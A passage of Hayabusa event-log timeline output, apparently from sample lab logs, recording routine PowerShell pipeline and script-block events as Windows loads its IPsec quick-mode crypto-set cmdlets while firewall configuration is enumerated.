(PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Remove-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
